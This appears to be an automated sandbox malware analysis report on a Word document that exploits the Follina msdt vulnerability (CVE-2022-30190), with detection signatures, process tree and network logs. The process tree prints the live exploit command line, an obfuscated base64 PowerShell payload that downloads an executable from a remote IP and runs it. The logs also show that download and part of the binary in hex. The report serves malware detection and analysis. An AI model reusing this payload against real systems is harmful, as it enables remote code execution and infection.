Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
20220714 DWG.doc

Overview

General Information

Sample Name:20220714 DWG.doc
Analysis ID:665041
MD5:5fd0deaaca6ac9645ba3e9aa8af3311c
SHA1:4823c45cde3606a5189462a8c4441686706d04f3
SHA256:b78c36823ab0b86b683d165e53405855b8e910c5011997e5a4a4620200cffc0a
Tags:doc
Infos:

Detection

Follina CVE-2022-30190
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Obfuscated command line found
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Binary contains a suspicious time stamp
PE file contains more sections than normal
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • WINWORD.EXE (PID: 6276 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • MSOSYNC.EXE (PID: 6604 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • msdt.exe (PID: 7084 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aWV4IChuZXctb2JqZWN0IHN5c3RlbS5uZXQud2ViY2xpZW50KS5kb3dubG9hZGZpbGUoImh0dHA6Ly80NS4xNDEuMjM3LjE4L0dsb21ldC5leGUiLCJjOlxwcm9ncmFtZGF0YVxHbG9tZXQuZXhlIik7U3RhcnQtUHJvY2VzcyAiYzpccHJvZ3JhbWRhdGFcR2xvbWV0LmV4ZSI='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
    • splwow64.exe (PID: 6808 cmdline: C:\Windows\splwow64.exe 12288 MD5: 8D59B31FF375059E3C32B17BF31A76D5)
  • csc.exe (PID: 4908 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q0vyiohn\q0vyiohn.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 5664 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES216A.tmp" "c:\Users\user\AppData\Local\Temp\q0vyiohn\CSC14339BC3D3E94BA0AEA5453DEFD3E9E.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 5396 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ea13q231\ea13q231.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 5904 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3EE5.tmp" "c:\Users\user\AppData\Local\Temp\ea13q231\CSCF24C6B632D84EA4B9FDE29780CB1444.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • Glomet.exe (PID: 6300 cmdline: "C:\programdata\Glomet.exe" MD5: 7A560CE2C90976F306953F3BF4EFEBF9)
    • cmd.exe (PID: 7112 cmdline: CMD.EXE /C SET /A "0x00^75" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • csc.exe (PID: 3400 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\llhoph4d\llhoph4d.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 6992 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDEDE.tmp" "c:\Users\user\AppData\Local\Temp\llhoph4d\CSCA6DEB1F21B847AF87589FE9AEBF81D1.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.576330720.0000000000C60000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
  • 0x28b2:$a: PCWDiagnostic
  • 0x2888:$sa1: msdt.exe
  • 0x289a:$sa3: ms-msdt
  • 0x2994:$sb3: IT_BrowseForFile=
0000000D.00000002.576330720.0000000000C60000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
    0000000D.00000002.576021489.0000000000BB0000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
    • 0x2338:$a: PCWDiagnostic
    • 0x22d0:$sa1: msdt.exe
    • 0x230c:$sa1: msdt.exe
    • 0x2848:$sa1: msdt.exe
    • 0x2320:$sa3: ms-msdt
    • 0x241c:$sb3: IT_BrowseForFile=
    0000000D.00000002.576021489.0000000000BB0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      0000000D.00000002.577239005.0000000000CF8000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
      • 0x3766:$a: PCWDiagnostic
      • 0x3f76:$a: PCWDiagnostic
      • 0x16414:$a: PCWDiagnostic
      • 0x6f48:$sa1: msdt.exe
      • 0x18d16:$sa1: msdt.exe
      • 0x25638:$sa1: msdt.exe
      • 0x278f0:$sb3: IT_BrowseForFile=
      Click to see the 3 entries

      Sigma Signatures

      No Sigma rule has matched

      Snort Signatures

      No Snort rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: 20220714 DWG.docVirustotal: Detection: 8%Perma Link

      Exploits

      barindex
      Yara detected Microsoft Office Exploit Follina CVE-2022-30190
      Source: Yara matchFile source: 0000000D.00000002.576330720.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.576021489.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.576945424.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: C:\ProgramData\Glomet.exeRegistry value created: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\Gratinr\Wr242\Boomerangernes\HypercenosisJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
      Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.29.dr
      Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.29.dr
      Source: C:\ProgramData\Glomet.exeCode function: 29_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,29_2_00405A19
      Source: C:\ProgramData\Glomet.exeCode function: 29_2_004065CE FindFirstFileA,FindClose,29_2_004065CE
      Source: C:\ProgramData\Glomet.exeCode function: 29_2_004027AA FindFirstFileA,29_2_004027AA

      Software Vulnerabilities

      barindex
      Document exploit detected (process start blacklist hit)
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe
      Source: global trafficTCP traffic: 192.168.2.3:49743 -> 45.141.237.18:80
      Source: global trafficTCP traffic: 192.168.2.3:49744 -> 45.141.237.18:80
      Source: winword.exeMemory has grown: Private usage: 0MB later: 110MB
      Source: global trafficHTTP traffic detected: GET /Glomet.exe HTTP/1.1Host: 45.141.237.18Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Thu, 14 Jul 2022 21:48:58 GMTAccept-Ranges: bytesETag: "7dc29185cb97d81:0"Server: Microsoft-IIS/10.0Date: Fri, 15 Jul 2022 13:28:25 GMTContent-Length: 346688Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 29 81 e9 50 47 d2 e9 50 47 d2 e9 50 47 d2 2a 5f 18 d2 eb 50 47 d2 e9 50 46 d2 49 50 47 d2 2a 5f 1a d2 e6 50 47 d2 bd 73 77 d2 e3 50 47 d2 2e 56 41 d2 e8 50 47 d2 52 69 63 68 e9 50 47 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3c 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 66 00 00 00 7c 02 00 00 04 00 00 b3 33 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 04 00 00 04 00 00 d1 f2 05 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 85 00 00 a0 00 00 00 00 80 04 00 d0 1f 00 00 00 00 00 00 00 00 00 00 50 2b 05 00 f0 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ba 65 00 00 00 10 00 00 00 66 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 13 00 00 00 80 00 00 00 14 00 00 00 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 55 02 00 00 a0 00 00 00 06 00 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 01 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 d0 1f 00 00 00 80 04 00 00 20 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
      Source: global trafficHTTP traffic detected: GET /Glomet.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 45.141.237.18Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Glomet.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 45.141.237.18If-Modified-Since: Thu, 14 Jul 2022 16:59:59 GMTIf-None-Match: "80119226a397d81:0"Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /icons/ubuntu-logo.png HTTP/1.1Accept: */*Referer: http://45.141.237.18/Glomet.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.141.237.18Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0Date: Fri, 15 Jul 2022 13:26:43 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 7
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: text/htmlContent-Encoding: gzipLast-Modified: Thu, 14 Jul 2022 16:59:59 GMTAccept-Ranges: bytesETag: "80119226a397d81:0"Vary: Accept-EncodingServer: Microsoft-IIS/10.0Date: Fri, 15 Jul 2022 13:26:41 GMTContent-Length: 4357Data Raw: 1f 8b 08 00 00 00 00 00 04 00 bc 5a 7b 77 da c8 92 ff 7f ce 99 ef a0 70 f7 1e 4c 02 08 49 3c 84 6d bc 27 f1 23 f1 ac f3 18 db 49 26 ce e6 78 5b 52 0b 34 16 6a 5d a9 65 4c b2 f9 ee 5b d5 dd 12 02 04 38 73 37 c3 b1 0c 52 77 d7 ab ab 7e 55 d5 70 f8 c4 63 2e 9f c7 54 9b f0 69 78 f4 eb 2f 87 f8 ae 85 24 1a 8f 6a 34 aa e1 93 27 ad d6 af bf 68 f0 7a cd bc c0 0f a8 a7 f9 09 9b 6a 7c 42 b5 13 ea 04 24 d2 58 12 8c 83 88 84 9a cf 12 ed bd 93 45 3c 93 2b 2e 48 ca b5 2c f6 08 a7 de be 66 76 8c 7e cb 30 5a 46 5f 8e 5e 51 ba 0f 7c 79 9c ee eb 7a 48 b2 c8 9d c4 c4 6b 47 94 eb 4e 36 4e 75 c3 b4 ed fe b0 83 93 5b ad 23 7c 3b 9c 50 e2 1d c9 d5 87 53 ca 89 58 de a2 ff ca 82 fb 51 ed 98 45 9c 46 bc 75 0d fa d4 34 57 de 8d 6a 9c 3e 70 1d d5 3a d0 dc 09 49 52 ca 47 ef af cf 5a 76 4d d3 73 52 3c e0 21 3d 7a 1e 13 77 42 4d a5 01 28 e7 93 2c e4 da 3b 32 06 39 cf b9 36 63 c9 5d 7a a8 cb c9 6a 65 ca e7 21 d5 d0 82 8a 91 9b a6 35 6d 4a bd 80 8c 6a a9 9b 50 69 44 4d 7b aa 7d 93 4b a6 24 01 63 ed 6b 9d f8 a1 7c 1d c8 51 30 80 17 44 e3 ea e1 ef bf fe 82 6f 0e f3 e6 4d b1 61 39 cd 62 95 05 b3 4b d7 81 5c 00 4b 88 7b 37 4e 58 16 79 2d 97 85 2c d9 d7 fe 71 62 9f bc 38 35 8b 19 3e 98 ab e5 93 69 10 ce f7 b5 0f 34 f1 48 44 9a 5a 4a a2 b4 95 d2 24 f0 0f 4a d3 d2 e0 2b 58 c4 30 62 ae 9e a2 e6 2d 12 06 63 d0 cb 05 a3 d3 a4 2c af 17 dc b7 a7 24 88 6e 63 b0 64 21 32 4b 03 1e 30 58 90 d0 90 f0 e0 9e 2a 5a 5e 90 c6 21 01 21 38 71 42 5a c8 37 0b 3c 3e d9 d7 ec 4e a7 a4 96 b4 65 cb 61 9c b3 e9 be d2 b8 34 10 52 9f ef 6b 24 e3 6c f9 39 f8 eb 64 79 60 8b dd 95 05 59 e2 d1 a4 a5 c4 30 0b 4e ea 79 6e 55 d3 30 07 96 bd 3c 26 7c 64 5f 4b 59 18 78 db 76 e4 4c bc 8a 19 bb 8d 8a f6 bc c5 90 a0 49 6e d6 09 95 aa 0d 87 85 84 4a 64 a3 d3 f9 e7 56 ee bd b3 fe d9 60 1b 8b 34 86 58 5f f1 62 a3 57 b2 57 af 6c b0 b2 a7 d8 82 75 f1 74 a6 84 74 58 e8 6d 63 18 4c c7 ab fc ac 12 bb ee fa fe ec 6f 8a 19 24 2d 1c ea 96 f9 b7 0a 1a d2 9c b8 1b 52 02 4b d1 5b 16 ae 05 6e 92 6f 76 85 cf fd 50 a8 6d d9 58 c5 73 bb 9c b7 01 a7 d3 6d c2 56 6d 71 2e 67 77 93 43 ef 94 33 7f dc 11 af 83 7f 4b 78 b2 ba 91 fd 92 58 fd f5 bd 52 ab 6f 53 ea 22 4a 54 b9 c1 cf 31 fe 0a e3 5b 9c bf 06 b3 68 53 1b 3d 50 be 6f b7 58 39 10 3a 2a 10 76 31 8c 13 ba aa b2 ad 8c 65 57 e7 0b 5b 0d d9 2b 22 2d e3 96 b1 8a 5b 0a 9b 3c 40 50 ea 55 43 5a a1 cc 6e e8 28 2b 2c 09 07 1c 6c ed 3e 4e e7 65 8d 0b 54 df ed 1d 72 7d 16 36 37 0f 86 c1 d6 4d 34 2a 98 e4 eb 97 01 76 29 d5 f6 95 0b f6 b7 bb a0 7d 3a 3c 7e 61 ae 79 49 e1 99 9b 81 71 25 e1 9a ff ac 88 c2 ea dc b0 2c fd 6d 02 65 db b7 8d 02 1e 9f 98 46 f7 6c 07 89 71 42 e7 5b 68 0c cf 86 96 dd 2f d3 68 fb 21 83 cc 1e 8d 6f 69 48 a7 20 e5 ce dc 2f 16 fc 18 ae 34 b7 fa 44 01 3b c2 60 1e 75 59 42 24 e7 88 45 f4 b1 39 69 13 ef fd 30 8
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: unknownTCP traffic detected without corresponding DNS query: 45.141.237.18
      Source: ~WRS{D2D7FF17-FD00-4D6F-9BD0-D27E7B55D2C5}.tmp.0.drString found in binary or memory: http://45.141.237.18/Glomet.html
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
      Source: battery-level-90-charging-symbolic.svg.29.drString found in binary or memory: http://creativecommons.org/licenses/by-sa/4.0/
      Source: battery-level-90-charging-symbolic.svg.29.drString found in binary or memory: http://creativecommons.org/ns#
      Source: battery-level-90-charging-symbolic.svg.29.drString found in binary or memory: http://creativecommons.org/ns#Attribution
      Source: battery-level-90-charging-symbolic.svg.29.drString found in binary or memory: http://creativecommons.org/ns#DerivativeWorks
      Source: battery-level-90-charging-symbolic.svg.29.drString found in binary or memory: http://creativecommons.org/ns#Distribution
      Source: battery-level-90-charging-symbolic.svg.29.drString found in binary or memory: http://creativecommons.org/ns#Notice
      Source: battery-level-90-charging-symbolic.svg.29.drString found in binary or memory: http://creativecommons.org/ns#Reproduction
      Source: battery-level-90-charging-symbolic.svg.29.drString found in binary or memory: http://creativecommons.org/ns#ShareAlike
      Source: msdt.exe, 0000000D.00000002.581158371.0000000000D61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
      Source: 678899CC.htm.0.dr, Glomet[1].htm.0.dr, FF013E73.htm.0.drString found in binary or memory: http://httpd.apache.org/docs/2.4/mod/mod_userdir.html
